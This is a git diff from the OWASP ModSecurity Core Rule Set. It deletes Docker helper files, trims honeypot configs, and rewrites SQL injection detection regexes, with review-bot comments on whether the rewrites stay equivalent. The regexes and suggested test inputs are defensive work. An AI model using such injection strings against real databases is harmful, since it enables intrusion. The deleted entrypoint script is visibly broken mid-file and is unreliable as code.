"daemon off;"] diff --git a/util/docker/README.md b/util/docker/README.md deleted file mode 100644 index 00dfc6414..000000000 --- a/util/docker/README.md +++ /dev/null 
@@ -1,107 +0,0 @@ -# Example -``` -docker build -t owasp/modsecurity-crs . -docker run -p 80:80 -ti -e PARANOIA=4 --rm owasp/modsecurity-crs -``` - -or - -``` -docker build -t owasp/modsecurity-crs . -docker run -p 80:80 -ti -e PARANOIA=4 -e PROXY=1 --rm owasp/modsecurity-crs -``` -# Environment Variables - -The following environment variables are available to configure the CRS container: - -| Name | Description| -| -------- | ------------------------------------------------------------------- | -| PARANOIA | An integer indicating the paranoia level (Default: 1) | -| PROXY | An integer indicating if reverse proxy mode is enabled (Default: 0) | -| UPSTREAM | The IP Address (and optional port) of the upstream server when proxy mode is enabled. (Default: the container's default router, port 81) (Examples: 192.0.2.2 or 192.0.2.2:80) | -| EXECUTING_PARANOIA | An integer indicating the executing_paranoia_level (Default: paranoia level) | -| ENFORCE_BODYPROC_URLENCODED | A boolean indicating the enforce_bodyproc_urlencoded (Default: 0) | -| ANOMALYIN | An integer indicating the inbound_anomaly_score_threshold (Default: 5) | -| ANOMALYOUT | An integer indicating the outbound_anomaly_score_threshold (Default: 4) | -| ALLOWED_METHODS | A string indicating the allowed_methods (Default: GET HEAD POST OPTIONS) | -| ALLOWED_REQUEST_CONTENT_TYPE | A string indicating the allowed_request_content_type (Default: application/x-www-form-urlencoded\|multipart/form-data\|text/xml\|application/xml\|application/soap+xml\|application/x-amf\|application/json\|application/octet-stream\|application/csp-report\|application/xss-auditor-report\|text/plain) | -| ALLOWED_REQUEST_CONTENT_TYPE_CHARSET | A string indicating the allowed_request_content_type_charset (Default: utf-8\|iso-8859-1\|iso-8859-15\|windows-1252) | -| ALLOWED_HTTP_VERSIONS | A string indicating the allowed_http_versions (Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0) | -| RESTRICTED_EXTENSIONS | A string indicating the 
restricted_extensions (Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/) | -| RESTRICTED_HEADERS | A string indicating the restricted_headers (Default: /proxy/ /lock-token/ /content-range/ /if/) | -| STATIC_EXTENSIONS | A string indicating the static_extensions (Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/) | -| MAX_NUM_ARGS | An integer indicating the max_num_args (Default: unlimited) | -| ARG_NAME_LENGTH | An integer indicating the arg_name_length (Default: unlimited) | -| ARG_LENGTH | An integer indicating the arg_length (Default: unlimited) | -| TOTAL_ARG_LENGTH | An integer indicating the total_arg_length (Default: unlimited) | -| MAX_FILE_SIZE | An integer indicating the max_file_size (Default: unlimited) | -| COMBINED_FILE_SIZES | An integer indicating the combined_file_sizes (Default: unlimited) | - -# Notes regarding reverse proxy - -In order to more easily test drive the CRS ruleset, we include support for an technique called [Reverse Proxy](https://en.wikipedia.org/wiki/Reverse_proxy). Using this technique, you keep your pre-existing web server online at a non-standard host and port, and then configure the CRS container to accept public traffic. The CRS container then proxies the traffic to your pre-existing webserver. This way, you can test out CRS with any web server. Some notes: - -* Proxy is not enabled by default. You'll need to pass the `-e PROXY=1` environment variable to enable it. -* You'll want to configure your typical webserver to listen on your docker interface only (i.e. 172.17.0.1:81) so that public traffic doesn't reach it. -* Do not use 127.0.0.1 as an UPSTREAM address. 
The loopback interface inside the docker container is not the same interface as the one on docker host. -* Note that traffic coming through this proxy will look like it's coming from the wrong address. You may want to configure your pre-existing webserver to use the `X-Forwarded-For` HTTP header to populate the remote address field for traffic from the proxy. - -# ModSecurity CRS Tuning - -There are two possible ways to pass ModSecurity CRS tuning rules to the container: - -* To map the ModSecurity tuning file(s) via volumes into the container during the run command -* To copy the ModSecurity tuning file(s) into the created container and then start the container - - -## Map ModSecurity tuning file via volume - -``` -docker run -dti --rm \ - -p 80:80 \ - -v /path/to/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf \ - -v /path/to/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf \ - owasp/modsecurity-crs -``` - -## Copy ModSecurity tuning file into created container - -This example can be helpful when no volume mounts are possible (some CI pipelines). 
- -``` -docker create -ti --name modseccrs \ - -p 80:80 \ - owasp/modsecurity-crs - -docker cp /path/to/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf \ - modseccrs:/etc/modsecurity.d/owasp-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - -docker start modseccrs -``` - -# Full docker run example with all possible environment variables - -``` -docker run -dti 80:80 --rm \ - -e PARANOIA=1 \ - -e EXECUTING_PARANOIA=2 \ - -e ENFORCE_BODYPROC_URLENCODED=1 \ - -e ANOMALYIN=10 \ - -e ANOMALYOUT=5 \ - -e ALLOWED_METHODS="GET POST PUT" \ - -e ALLOWED_REQUEST_CONTENT_TYPE="text/xml|application/xml|text/plain" \ - -e ALLOWED_REQUEST_CONTENT_TYPE_CHARSET="utf-8|iso-8859-1" \ - -e ALLOWED_HTTP_VERSIONS="HTTP/1.1 HTTP/2 HTTP/2.0" \ - -e RESTRICTED_EXTENSIONS=".cmd/ .com/ .config/ .dll/" \ - -e RESTRICTED_HEADERS="/proxy/ /if/" \ - -e STATIC_EXTENSIONS="/.jpg/ /.jpeg/ /.png/ /.gif/" \ - -e MAX_NUM_ARGS=128 \ - -e ARG_NAME_LENGTH=50 \ - -e ARG_LENGTH=200 \ - -e TOTAL_ARG_LENGTH=6400 \ - -e MAX_FILE_SIZE=100000 \ - -e COMBINED_FILE_SIZES=1000000 \ - -e PROXY=1 \ - -e 192.0.2.2:80 \ - owasp/modsecurity-crs -``` diff --git a/util/docker/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf b/util/docker/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf deleted file mode 100644 index cfa1ba4c4..000000000 --- a/util/docker/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf +++ /dev/null @@ -1,7 +0,0 @@ -# https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.2/dev/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example -# -# "...,ctl:ruleRemoveById=942100" -# "...,ctl:ruleRemoveByTag=attack-sqli" -# "...,ctl:ruleRemoveTargetById=942100;ARGS:password" -# "...,ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:password" - diff --git a/util/docker/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf b/util/docker/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf deleted file mode 100644 index 3fdbb9711..000000000 --- a/util/docker/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf +++ /dev/null 
@@ -1,7 +0,0 @@ -# https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.2/dev/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example -# -# Examples: -# SecRuleRemoveById 942100 -# SecRuleRemoveByTag "attack-sqli" -# SecRuleUpdateTargetById 942100 "!ARGS:password" -# SecRuleUpdateTargetByTag "attack-sqli" "!ARGS:password" diff --git a/util/docker/docker-compose.yaml b/util/docker/docker-compose.yaml deleted file mode 100644 index bfdade1bc..000000000 --- a/util/docker/docker-compose.yaml +++ /dev/null 
@@ -1,82 +0,0 @@ -# This docker-compose file starts owasp/modsecurity-crs -# -# ATTENTION! -# Some of the environment variables at the bottom of this -# docker-compose.yaml file and TLS are only available -# for self-built images based on Dockerfile-2.9-apache, -# and only if build args SETTLS and SETPROXY were set during -# the build of the parent owasp/modsecurity:2.9-apache image. - -version: "3" - -services: - - crs: - image: owasp/modsecurity-crs - ports: - - "80:80" - # only available if SETTLS was enabled: - - "443:443" - - environment: - - SERVERNAME=localhost - - ############################################# - # CRS Variables - ############################################# - # Paranoia Level - - PARANOIA=1 - # Inbound and Outbound Anomaly Score Threshold - - ANOMALYIN=5 - - ANOMALYOUT=4 - # Executing Paranoia Level - # - EXECUTING_PARANOIA=2 - - ####################################################### - # Reverse Proxy mode - # (only available if SETPROXY was enabled during the - # parent ModSecurity image) - ####################################################### - # PROXYLOCATION: Application Backend of Reverse Proxy - # - PROXYLOCATION=http://app:8000/ - # - # If needed: add own httpd-proxy.conf (only available if SETPROXY - # was enabled during build of parent ModSecurity image) - # - ./httpd-proxy.conf:/usr/local/apache2/conf/extra/httpd-proxy.conf - - ####################################################### - # Various CRS Variables with Default Values - ####################################################### - #- ENFORCE_BODYPROC_URLENCODED=1 - #- ALLOWED_METHODS=GET HEAD POST OPTIONS - #- ALLOWED_REQUEST_CONTENT_TYPE=application/x-www-form-urlencoded|multipart/form-data|text/xml|application/xml|application/soap+xml|application/x-amf|application/json|application/octet-stream|text/plain - #- ALLOWED_REQUEST_CONTENT_TYPE_CHARSET=utf-8|iso-8859-1|iso-8859-15|windows-1252 - #- ALLOWED_HTTP_VERSIONS=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 - #- 
RESTRICTED_EXTENSIONS=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ - #- RESTRICTED_HEADERS=/proxy/ /lock-token/ /content-range/ /if/ - #- STATIC_EXTENSIONS=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ - - ####################################################### - # CRS Variables with Default Value unlimited - ####################################################### - #- MAX_NUM_ARGS=255 - #- ARG_NAME_LENGTH=100 - #- ARG_LENGTH=400 - #- TOTAL_ARG_LENGTH=64000 - #- MAX_FILE_SIZE=1048576 - #- COMBINED_FILE_SIZES=1048576 - - ####################################################### - # Volumes for ModSecurity Tuning - ####################################################### - volumes: - - ./REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf - - ./RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - - ####################################################### - # Add TLS server certificate and key - # (only available if SETPROXY was enabled during the - # parent ModSecurity image) - ####################################################### - # - ./server.crt:/usr/local/apache2/conf/server.crt - # - ./server.key:/usr/local/apache2/conf/server.key diff --git a/util/docker/docker-entrypoint.sh b/util/docker/docker-entrypoint.sh deleted file mode 100755 index 90db2a8f0..000000000 --- a/util/docker/docker-entrypoint.sh +++ /dev/null 
@@ -1,185 +0,0 @@ -#!/bin/bash - -# Paranoia Level -$(python <s %b \ -\"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \ -%{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \ -%I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \ -%{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \ -%{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended - -CustomLog ${ACCESSLOG} extended - - -# === ModSec timestamps at the start of each phase (ids: 90000 - 90009) - -SecAction "id:90000,phase:1,nolog,pass,setvar:TX.ModSecTimestamp1start=%{DURATION}" -SecAction "id:90001,phase:2,nolog,pass,setvar:TX.ModSecTimestamp2start=%{DURATION}" -SecAction "id:90002,phase:3,nolog,pass,setvar:TX.ModSecTimestamp3start=%{DURATION}" -SecAction "id:90003,phase:4,nolog,pass,setvar:TX.ModSecTimestamp4start=%{DURATION}" -SecAction "id:90004,phase:5,nolog,pass,setvar:TX.ModSecTimestamp5start=%{DURATION}" diff --git a/util/docker/proxy.conf b/util/docker/proxy.conf deleted file mode 100644 index 4dee0c9b4..000000000 --- a/util/docker/proxy.conf +++ /dev/null @@ -1,3 +0,0 @@ - - ProxyPass "/" "http://${UPSTREAM}/" - diff --git a/util/honeypot-sensor/README.md b/util/honeypot-sensor/README.md index b4daf67d7..66fc6af9b 100644 --- a/util/honeypot-sensor/README.md +++ b/util/honeypot-sensor/README.md @@ -1,6 +1,6 @@ The purpose of these files is to turn your current ModSecurity host into a pseudo-honeypot sensor by doing the following: - + 1. Instructs Apache to listen for traffic on multiple unused ports - 8000 - 8080 diff --git a/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/util/honeypot-sensor/mlogc-honeypot-sensor.conf index faab2c18a..b4afad140 100644 --- a/util/honeypot-sensor/mlogc-honeypot-sensor.conf +++ b/util/honeypot-sensor/mlogc-honeypot-sensor.conf @@ -95,4 +95,3 @@ ServerErrorTimeout 60 # reserved for future expansion. # KeepAlive 150 # KeepAliveTimeout 300 - 
diff --git a/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
index 5f5344c63..7002bb76e 100644
--- a/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
+++ b/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
@@ -28,4 +28,3 @@ DocumentRoot "/usr/local/apache/honeypot-htdocs" SecAuditEngine On SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf"
-
diff --git a/util/regexp-assemble/regexp-934100.txt b/util/regexp-assemble/regexp-934100.txt
index 0f34b3143..64065bc61 100644
--- a/util/regexp-assemble/regexp-934100.txt
+++ b/util/regexp-assemble/regexp-934100.txt
@@ -5,4 +5,4 @@ String\s*\.\s*fromCharCode
 function\s*\(\s*\)\s*{
 new\s+Function\s*\(
 this\.constructor
-module\.exports\s*=
\ No newline at end of file
+module\.exports\s*=
diff --git a/util/regexp-assemble/regexp-942210.data b/util/regexp-assemble/regexp-942210.data
index 489559033..1dd373cb8 100644
--- a/util/regexp-assemble/regexp-942210.data
+++ b/util/regexp-assemble/regexp-942210.data
@@ -1,10 +1,10 @@
 @.+=\s*?\(\s*?select
-\d+\s*?or\s*?\d+\s*?[\-+]
-\d+\s*?xor\s*?\d+\s*?[\-+]
-\d+\s*?div\s*?\d+\s*?[\-+]
-\d+\s*?like\s*?\d+\s*?[\-+]
-\d+\s*?between\s*?\d+\s*?[\-+]
-\d+\s*?and\s*?\d+\s*?[\-+]
+\d\s*?or\s*?\d+\s*?[\-+]
+\d\s*?xor\s*?\d+\s*?[\-+]
+\d\s*?div\s*?\d+\s*?[\-+]
+\d\s*?like\s*?\d+\s*?[\-+]
+\d\s*?between\s*?\d+\s*?[\-+]
+\d\s*?and\s*?\d+\s*?[\-+]
 \/\w+;?\s+having\W
 \/\w+;?\s+and\W
 \/\w+;?\s+or\W
diff --git a/util/regexp-assemble/regexp-942260.data b/util/regexp-assemble/regexp-942260.data
index 93b87cdb3..697ac400d 100644
--- a/util/regexp-assemble/regexp-942260.data
+++ b/util/regexp-assemble/regexp-942260.data
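Review bot: The six rewritten lines in regexp-942210.data drop the `+` after the leading `\d`, and that is detection-equivalent only because the assembled expression is applied unanchored: wherever `\d+\s*?or\s*?\d+\s*?[\-+]` matched, `\d\s*?or\s*?\d+\s*?[\-+]` matches from the last digit of the same run, so nothing is narrowed, while a long digit run that is not followed by the keyword no longer gets re-scanned from every digit. This diff shows only the regexp-assemble input; I do not see the regenerated 942210 `@rx` in the rules file or a regression case here, so please confirm the rule was rebuilt from this file and add a test with a long digit run such as `11111111111111 or 1+` so the intent stays pinned. If the data file format accepts comments, a one-line note such as `# leading \d deliberately unquantified: the match is unanchored, so \d+ only adds backtracking` would stop the quantifier from being reintroduced.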
@@ -2,7 +2,7 @@ union\s*?\s*?[([]*?\s*?select\s+
 union\s*?all\s*?[([]*?\s*?select\s+
 union\s*?distinct\s*?[([]*?\s*?select\s+
 union\s*?[(!@]*?\s*?[([]*?\s*?select\s+
-\w+\s+like\s+[\"'`]
+\w\s+like\s+[\"'`]
 like\s*?[\"'`]\%
 [\"'`]\s*?like\W*?[\"'`\d]
 [\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+
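Review bot: `\w\s+like\s+[\"'`]` still requires one word character (digits and `_` included) before the whitespace, and for an unanchored match any input caught by the removed `\w+\s+like\s+[\"'`]` is caught from the last character of the same run, so the rewrite only removes the quadratic re-scan over long word runs. That equivalence holds only if the assembly step does not prepend an anchor or lookbehind to each alternative; the assemble invocation is not visible here, so confirm the produced 942260 expression is still unanchored. As with the sibling data file, the regenerated rule body and a regression case such as `aaaaaaaaaaaaaaaa like '` are not in this diff and should accompany the change.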